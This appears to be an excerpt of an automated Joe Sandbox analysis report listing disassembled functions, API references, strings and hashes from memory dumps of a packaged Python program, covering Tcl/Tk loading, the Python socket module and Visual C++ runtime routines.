Failed to get address for %hs, xrefs: 00007FF6399B6ED0
Tcl_SetVar2Ex, xrefs: 00007FF6399B7285, 00007FF6399B72A1
Tcl_CreateObjCommand, xrefs: 00007FF6399B71E5, 00007FF6399B7201
Tcl_FinalizeThread, xrefs: 00007FF6399B6F8D, 00007FF6399B6FA9
Tcl_GetCurrentThread, xrefs: 00007FF6399B7005, 00007FF6399B7021
Tcl_Init, xrefs: 00007FF6399B6EB0, 00007FF6399B6EC9
Tcl_ConditionNotify, xrefs: 00007FF6399B70F5, 00007FF6399B7111
Tcl_GetString, xrefs: 00007FF6399B720D, 00007FF6399B7229
Tcl_MutexLock, xrefs: 00007FF6399B7055, 00007FF6399B7071
Tcl_FindExecutable, xrefs: 00007FF6399B6F18, 00007FF6399B6F34
Tcl_ThreadAlert, xrefs: 00007FF6399B716D, 00007FF6399B7189
GetProcAddress, xrefs: 00007FF6399B6ED7
Tcl_EvalEx, xrefs: 00007FF6399B72FD, 00007FF6399B7319
Tcl_SetVar2, xrefs: 00007FF6399B71BD, 00007FF6399B71D9
Tcl_MutexUnlock, xrefs: 00007FF6399B707D, 00007FF6399B7099
Tcl_JoinThread, xrefs: 00007FF6399B702D, 00007FF6399B7049
Tk_Init, xrefs: 00007FF6399B739D, 00007FF6399B73B9
Tcl_NewByteArrayObj, xrefs: 00007FF6399B725D, 00007FF6399B7279
Tcl_DeleteInterp, xrefs: 00007FF6399B6FB5, 00007FF6399B6FD1
Tcl_CreateThread, xrefs: 00007FF6399B6FDD, 00007FF6399B6FF9
Tcl_ThreadQueueEvent, xrefs: 00007FF6399B7145, 00007FF6399B7161
Tk_GetNumMainWindows, xrefs: 00007FF6399B73C5, 00007FF6399B73E1

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: b0625da47e1d62b4d2f7ed068b07fa581d285f2619d457baafaa486d2f2e8487
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: 0BE1B265959B03D0FA199F15E8801B462B3EF19795F8C1136D80E82BEEEF3CB558AB40

Function 00007FFE1A498EE4 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A499455
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49948A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4994C3

Strings

wchar_t, xrefs: 00007FFE1A499376
volatile, xrefs: 00007FFE1A4992FB
int, xrefs: 00007FFE1A498F90
decltype(auto), xrefs: 00007FFE1A49932C
__int8, xrefs: 00007FFE1A4990FE
UNKNOWN, xrefs: 00007FFE1A499358
auto, xrefs: 00007FFE1A499217
char16_t, xrefs: 00007FFE1A4991E4
short, xrefs: 00007FFE1A498FA2
long , xrefs: 00007FFE1A498FF3
__w64 , xrefs: 00007FFE1A49910A
unsigned , xrefs: 00007FFE1A499412
this , xrefs: 00007FFE1A49937F
double, xrefs: 00007FFE1A49900A
const, xrefs: 00007FFE1A4992B3
char32_t, xrefs: 00007FFE1A4993D7
__int16, xrefs: 00007FFE1A4990EC
<unknown>, xrefs: 00007FFE1A4991F6
bool, xrefs: 00007FFE1A4991AC
long, xrefs: 00007FFE1A498F7E
char, xrefs: 00007FFE1A498FB4
volatile, xrefs: 00007FFE1A4992CE
signed , xrefs: 00007FFE1A499422
__int128, xrefs: 00007FFE1A49917C
__int32, xrefs: 00007FFE1A49919A
__int64, xrefs: 00007FFE1A49918B
float, xrefs: 00007FFE1A499036
void, xrefs: 00007FFE1A499048
char8_t, xrefs: 00007FFE1A499205

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1482988683
Opcode ID: 36e6e2d055789cd29251c4bf9697f6c8a4377c58ea8e1572b96a4f003d2d3a05
Instruction ID: 23eebf2bf868b2e987e14bddb58097561148dd914405da8d7487340ce5b2d528
Opcode Fuzzy Hash: 36e6e2d055789cd29251c4bf9697f6c8a4377c58ea8e1572b96a4f003d2d3a05
Instruction Fuzzy Hash: 1C023C75B18A2388FB358F66D4941BC26A4BB0DB64F5041FBDA0F52AB9DF38A574C340

Function 00007FFE14636660 Relevance: 56.2, APIs: 24, Strings: 8, Instructions: 242threadCOMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON311 ref: 00007FFE146366F8
PyUnicode_AsEncodedString.PYTHON311 ref: 00007FFE14636732
PyLong_AsLong.PYTHON311 ref: 00007FFE14636775
PyErr_Occurred.PYTHON311 ref: 00007FFE14636782
PyOS_snprintf.PYTHON311 ref: 00007FFE146367A4
PyUnicode_AsUTF8.PYTHON311 ref: 00007FFE146367C7
PySys_Audit.PYTHON311 ref: 00007FFE14636825
PyEval_SaveThread.PYTHON311 ref: 00007FFE1463685B
getaddrinfo.WS2_32 ref: 00007FFE14636872
PyEval_RestoreThread.PYTHON311 ref: 00007FFE1463687D
PyList_New.PYTHON311 ref: 00007FFE14636899
_Py_BuildValue_SizeT.PYTHON311 ref: 00007FFE14636903
_Py_Dealloc.PYTHON311 ref: 00007FFE14636915
PyList_Append.PYTHON311 ref: 00007FFE14636926
_Py_Dealloc.PYTHON311 ref: 00007FFE14636941
_Py_Dealloc.PYTHON311 ref: 00007FFE14636962
freeaddrinfo.WS2_32 ref: 00007FFE14636971
_Py_Dealloc.PYTHON311 ref: 00007FFE14636984
_Py_Dealloc.PYTHON311 ref: 00007FFE14636993
PyErr_SetString.PYTHON311 ref: 00007FFE146369AC
_Py_Dealloc.PYTHON311 ref: 00007FFE146369C0
freeaddrinfo.WS2_32 ref: 00007FFE146369CF
PyErr_SetString.PYTHON311 ref: 00007FFE146369E8

Strings

OOiii, xrefs: 00007FFE14636802
%ld, xrefs: 00007FFE14636794
socket.getaddrinfo, xrefs: 00007FFE14636813
idna, xrefs: 00007FFE1463672B
iiisO, xrefs: 00007FFE146368F9
Int or String expected, xrefs: 00007FFE146369A2
getaddrinfo() argument 1 must be string or None, xrefs: 00007FFE146369DE
OO|iiii:getaddrinfo, xrefs: 00007FFE146366B4

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Dealloc$Err_String$Eval_List_SizeThreadUnicode_freeaddrinfo$AppendArg_AuditBuildEncodedKeywords_LongLong_OccurredParseRestoreS_snprintfSaveSys_TupleValue_getaddrinfo
String ID: %ld$Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
API String ID: 3700949282-3943835681
Opcode ID: 9fcdc6d02ec92686055524ae5c259f9121c9863c59131a83b4ab121cd6063ad0
Instruction ID: de58260120933ba7fdf58c1ddec0769309a8ddc4240a52fad627a724ff4e0cb0
Opcode Fuzzy Hash: 9fcdc6d02ec92686055524ae5c259f9121c9863c59131a83b4ab121cd6063ad0
Instruction Fuzzy Hash: EAB1FF76B08E8286EB60CF66D4905BC23B1EB46BACB444575DD4E57B68DF3CE849C380

Function 00007FFDFF1987EC Relevance: 51.1, APIs: 3, Strings: 26, Instructions: 323COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF198C99
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF198CD1
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF198D0B

Strings

short, xrefs: 00007FFDFF1988A0
char32_t, xrefs: 00007FFDFF198A6D
__int64, xrefs: 00007FFDFF1989CA
wchar_t, xrefs: 00007FFDFF198A5E
void, xrefs: 00007FFDFF198ABC
float, xrefs: 00007FFDFF198867
UNKNOWN, xrefs: 00007FFDFF198A55
const, xrefs: 00007FFDFF198B58
char16_t, xrefs: 00007FFDFF198A7C
int, xrefs: 00007FFDFF198897
long, xrefs: 00007FFDFF198888
bool, xrefs: 00007FFDFF1989E8
signed , xrefs: 00007FFDFF198C66
__int16, xrefs: 00007FFDFF198999
__int8, xrefs: 00007FFDFF198930
double, xrefs: 00007FFDFF198C13
__int32, xrefs: 00007FFDFF1989D6
volatile, xrefs: 00007FFDFF198BA0
long , xrefs: 00007FFDFF198BFC
__w64 , xrefs: 00007FFDFF19893C
unsigned , xrefs: 00007FFDFF198C56
__int128, xrefs: 00007FFDFF1989BE
volatile, xrefs: 00007FFDFF198B73
char8_t, xrefs: 00007FFDFF198A94
char, xrefs: 00007FFDFF1988AF
<unknown>, xrefs: 00007FFDFF198A8B

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$char16_t$char32_t$char8_t$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1201493255
Opcode ID: 6d03c317de7a5f19b21f0837a731510512d8948382e84f2b29aa15a4bf8a0d75
Instruction ID: 47cdb63da84f104132f78187986fa7c4bd2e7d83cf2c620dce040cb65871fa8f
Opcode Fuzzy Hash: 6d03c317de7a5f19b21f0837a731510512d8948382e84f2b29aa15a4bf8a0d75
Instruction Fuzzy Hash: EAF13B62F19A1298FB248F54D8A0ABC2360BB05798F944736DA3D966DDDF3CA644C384

Function 00007FFE14633588 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 167networkCOMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON311 ref: 00007FFE1463368E
PyErr_Format.PYTHON311 ref: 00007FFE146337DF
_Py_Dealloc.PYTHON311 ref: 00007FFE1463382F
htons.WS2_32 ref: 00007FFE1463384A

Strings

%s(): flowinfo must be 0-1048575., xrefs: 00007FFE1463372E
%s(): AF_INET6 address must be tuple, not %.500s, xrefs: 00007FFE14633675
%s(): port must be 0-65535., xrefs: 00007FFE146337CA
%s(): wrong format, xrefs: 00007FFE1463361C
%s(): unknown Bluetooth protocol, xrefs: 00007FFE146335E4
O&i;AF_INET address must be a pair (host, port), xrefs: 00007FFE146337A5
%s(): AF_INET address must be tuple, not %.500s, xrefs: 00007FFE14633782
%s(): bad family, xrefs: 00007FFE146335CB
O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]]), xrefs: 00007FFE146336BF

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Err_Format$Deallochtons
String ID: %s(): AF_INET address must be tuple, not %.500s$%s(): AF_INET6 address must be tuple, not %.500s$%s(): bad family$%s(): flowinfo must be 0-1048575.$%s(): port must be 0-65535.$%s(): unknown Bluetooth protocol$%s(): wrong format$O&i;AF_INET address must be a pair (host, port)$O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]])
API String ID: 2819711985-3893595010
Opcode ID: 14753f0566e029aadbc56689752e4c66fb9a0cb93e157e5672a84a9cb58df628
Instruction ID: 6463d14f2b840c25ade89d550d57c7b5061733ffc315cfd5ef19f49e266c4c00
Opcode Fuzzy Hash: 14753f0566e029aadbc56689752e4c66fb9a0cb93e157e5672a84a9cb58df628
Instruction Fuzzy Hash: D78109B6A08F8695EB10CF62D8846B933B0EB46B6CF545172DA0D57768DF3CE588C780

Function 00007FFE1A49C78C Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 289COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C81D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C856
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C92A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C93B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C9A3
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C9B3
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C9FF
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CA11
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CB83

Part of subcall function 00007FFE1A49E72C: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A49E786

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CC05
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CC14

Strings

`anonymous namespace', xrefs: 00007FFE1A49CAE3

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID: `anonymous namespace'
API String ID: 3863519203-3062148218
Opcode ID: 29843075ff213e4678463bd9e4c4852a4219599ce3764149382065ef125c3596
Instruction ID: 6308adc513e16ba8695eb732a85d03c402c23b870f6876a55a6ac0cbc83f2a84
Opcode Fuzzy Hash: 29843075ff213e4678463bd9e4c4852a4219599ce3764149382065ef125c3596
Instruction Fuzzy Hash: DDE12C72A08B8299EB30CF26E4801BD77A0FB49B94F5041B6EA5E17B66DF38D575C700

Function 00007FFDFF19B904 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B995
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B9CE
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BAA2
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BAB3
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BB16
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BB26
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BB72
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BB84
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BCF7
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BD77
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BD86

Strings

`anonymous namespace', xrefs: 00007FFDFF19BC57

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID: `anonymous namespace'
API String ID: 2943138195-3062148218
Opcode ID: 2d62d21c16bed949c13363c3ecd5d3c5a409f7cecbbe559722e90c9130d6a852
Instruction ID: 8b241f4e4ca3bacdd3b8825a815d26b1f462be181acf5eb570e155effb5adbde
Opcode Fuzzy Hash: 2d62d21c16bed949c13363c3ecd5d3c5a409f7cecbbe559722e90c9130d6a852
Instruction Fuzzy Hash: B1E19D73E08B8695EB20CF24E4A05AD77A0FB84788F405235EA6D57BADDF38D654C740

Function 00007FFDFF1725ED Relevance: 27.1, APIs: 18, Instructions: 125COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF172606
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF172614
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF17262C
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF17264A
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF17265A
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF172680
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF1726B3
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF1726E1
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF172700
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF172716
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF172724
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF172738
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF172756
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF17276F
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF17279C
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF1727AD
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF1AF324

Part of subcall function 00007FFDFF162070: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFF15F368,?,?,?), ref: 00007FFDFF162085

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast$FreeHeap
String ID:
API String ID: 3324550332-0
Opcode ID: 9a0470c1e02675e0e9dfd4322c33feefaf361b05e1ecb6c2e308b09382b2a795
Instruction ID: 7f5e23d7966d7a3d23bd19f55457f556fd37912f1fc03df8ebf5e9ac30c93247
Opcode Fuzzy Hash: 9a0470c1e02675e0e9dfd4322c33feefaf361b05e1ecb6c2e308b09382b2a795
Instruction Fuzzy Hash: 3A516E26F09A8386FB185B25A974D392361AF95BA0F140734D87E867DEDF7CB9028700

Function 00007FFDFF19AB2C Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 497COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19AC0A
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19AC81
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19AD4F
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19AF48
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19AFC5
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19AFDD
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B001
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B025
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B04B
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B066
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B086
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B096
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B0A5
UnDecorator::getSymbolName.LIBVCRUNTIME ref: 00007FFDFF19B1C1

Strings

operator, xrefs: 00007FFDFF19ABDE

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+$Decorator::getNameSymbol
String ID: operator
API String ID: 2896215693-3618023297
Opcode ID: b6b39716f4d1c18318290fdfc89748c31daab675f97323ebca028b6ec366b22c
Instruction ID: 16e2437cd59c09641c504de7e2ec98a79a90c0883546186080495414547ac56d
Opcode Fuzzy Hash: b6b39716f4d1c18318290fdfc89748c31daab675f97323ebca028b6ec366b22c
Instruction Fuzzy Hash: 21226B63F18A5689FB24DF64D8A49BC33A1AF45788F404336DA3D57ADDDF28A5088380

Function 00007FFE146346BC Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114networkthreadCOMMON

Download Yara Rule

APIs

_PyDeadline_Get.PYTHON311 ref: 00007FFE14634710
_PyDeadline_Init.PYTHON311 ref: 00007FFE14634738
WSAGetLastError.WS2_32 ref: 00007FFE14634763
WSAGetLastError.WS2_32 ref: 00007FFE1463476B
PyErr_CheckSignals.PYTHON311 ref: 00007FFE1463477C
PyEval_SaveThread.PYTHON311 ref: 00007FFE146347A7
PyEval_RestoreThread.PYTHON311 ref: 00007FFE146347C1
WSAGetLastError.WS2_32 ref: 00007FFE146347D0
WSAGetLastError.WS2_32 ref: 00007FFE146347D8
PyErr_CheckSignals.PYTHON311 ref: 00007FFE146347E5

Part of subcall function 00007FFE14633BA8: _PyTime_AsTimeval_clamp.PYTHON311 ref: 00007FFE14633BFD
Part of subcall function 00007FFE14633BA8: PyEval_SaveThread.PYTHON311 ref: 00007FFE14633C3C
Part of subcall function 00007FFE14633BA8: select.WS2_32 ref: 00007FFE14633C70
Part of subcall function 00007FFE14633BA8: PyEval_RestoreThread.PYTHON311 ref: 00007FFE14633C7B

WSAGetLastError.WS2_32 ref: 00007FFE146347F8
WSAGetLastError.WS2_32 ref: 00007FFE1463480D
PyErr_SetString.PYTHON311 ref: 00007FFE14634849

Strings

timed out, xrefs: 00007FFE1463483F

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: ErrorLast$Eval_Thread$Err_$CheckDeadline_RestoreSaveSignals$InitStringTime_Timeval_clampselect
String ID: timed out
API String ID: 497267021-3163636755
Opcode ID: 90c6b31df7990d27f2a8fe7a866390ac8235e07df1dd76b4515201a7f731cca9
Instruction ID: d9b313fffc60e47659bfd41691d91e37725c8b931e5bd930a16c306435709136
Opcode Fuzzy Hash: 90c6b31df7990d27f2a8fe7a866390ac8235e07df1dd76b4515201a7f731cca9
Instruction Fuzzy Hash: C2413F29E09EC285FB655B63A4C4279A2A0EF47BBCF1441B0CD5D427B4DF3CE88D8690

Function 00007FFE14637698 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FFE146376C5
PyErr_SetString.PYTHON311 ref: 00007FFE146376F1
PyBuffer_Release.PYTHON311 ref: 00007FFE146376FC
PyErr_SetString.PYTHON311 ref: 00007FFE1463772B
PyBuffer_Release.PYTHON311 ref: 00007FFE14637736
inet_ntop.WS2_32 ref: 00007FFE1463775D
PyBuffer_Release.PYTHON311 ref: 00007FFE1463776B
PyErr_SetFromErrno.PYTHON311 ref: 00007FFE14637780
PyUnicode_FromString.PYTHON311 ref: 00007FFE146377AB
PyErr_Format.PYTHON311 ref: 00007FFE146377C7
PyBuffer_Release.PYTHON311 ref: 00007FFE146377D2

Strings

iy*:inet_ntop, xrefs: 00007FFE146376B9
unknown address family %d, xrefs: 00007FFE146377BA
invalid length of packed IP address string, xrefs: 00007FFE146376E7, 00007FFE14637721

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
